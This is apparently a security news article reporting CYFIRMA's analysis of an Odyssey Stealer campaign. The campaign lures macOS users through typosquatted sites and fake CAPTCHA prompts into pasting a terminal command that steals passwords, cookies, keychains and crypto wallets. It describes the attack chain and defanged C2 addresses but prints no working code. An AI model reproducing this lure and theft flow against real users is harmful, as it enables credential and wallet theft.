Threat Actors Use Clickfix Tactics to Deploy Malicious AppleScripts for Stealing Login Credentials

The CYFIRMA research team has identified a sophisticated cybercrime campaign leveraging Clickfix tactics to deliver malicious AppleScripts (osascripts) aimed at macOS users. 

The operation, attributed to the Odyssey Stealer malware family, employs typosquatted domains resembling legitimate finance, Apple App Store, and cryptocurrency news sites to lure unsuspecting victims. 

This campaign is primarily focused on harvesting browser cookies, saved passwords, cryptocurrency wallet data, and sensitive browser plugin information from individuals interested in finance and digital assets.

Technical Analysis of the Attack Chain

The attack begins when a user inadvertently visits a typosquatted website crafted to mimic trusted domains. Upon landing, visitors are presented with a fake Cloudflare CAPTCHA prompt. 

Below this, macOS users are instructed to copy a Base64-encoded command and execute it in the terminal. 

This command fetches and runs a lengthy, albeit unobfuscated, AppleScript from a remote command-and-control (C2) server, such as odyssey1[.]to or 45[.]135.232.33.

Once executed, the AppleScript displays a deceptive authentication prompt to capture the user’s password. 

The script then uses the macOS dscl utility with the authonly parameter to silently validate and harvest the credentials, keeping the malicious activity hidden from the victim. 

The script also creates a temporary directory (e.g., /tmp/lovemrtrump) to store exfiltrated data, including macOS keychain files, browser data, and documents.

Comprehensive Data Exfiltration

Odyssey Stealer is engineered to target a wide array of data sources:

• Browsers: It extracts saved passwords, payment information, browsing history, and session cookies from Chrome, Chromium-based browsers (Brave, Edge, Opera), Firefox, and Safari.
• Cryptocurrency Wallets: The malware specifically targets desktop wallets (Electrum, Coinomi, Exodus) and browser extensions (MetaMask, etc.), stealing private keys and seed phrases.
• Personal Files: It searches for and exfiltrates files with extensions such as .txt, .pdf, .docx, .jpg, .png, .rtf, and .kdbx from the user’s Desktop and Documents folders.

All collected data is compressed into a ZIP archive and transmitted to attacker-controlled servers using a curl POST request. 

The malware is designed for persistence, retrying data exfiltration up to ten times in case of network failures.

Odyssey Stealer has evolved from the Poseidon Stealer, itself a fork of the AMOS Stealer, and is actively maintained by actors associated with Russian cybercriminal forums. 

According to Cyfirma Report, the malware is offered as a service, featuring a web-based control panel for attackers to manage stolen data, configure payloads, and monitor infected devices. 

The campaign predominantly targets users in Western countries, while deliberately avoiding CIS nations a hallmark of Russian-aligned threat groups.

The Odyssey Stealer campaign demonstrates a high level of technical sophistication in targeting macOS users, particularly those in the finance and cryptocurrency sectors. 

By leveraging social engineering and technical exploits, the attackers are able to harvest sensitive credentials and financial data at scale. 

Organizations and end-users are urged to remain vigilant, restrict the execution of AppleScripts, and implement robust endpoint and network security controls to mitigate the risk of compromise.

Indicators of Compromise (IOC)

Find this Story Interesting! Follow us on LinkedIn and X to Get More Instant updates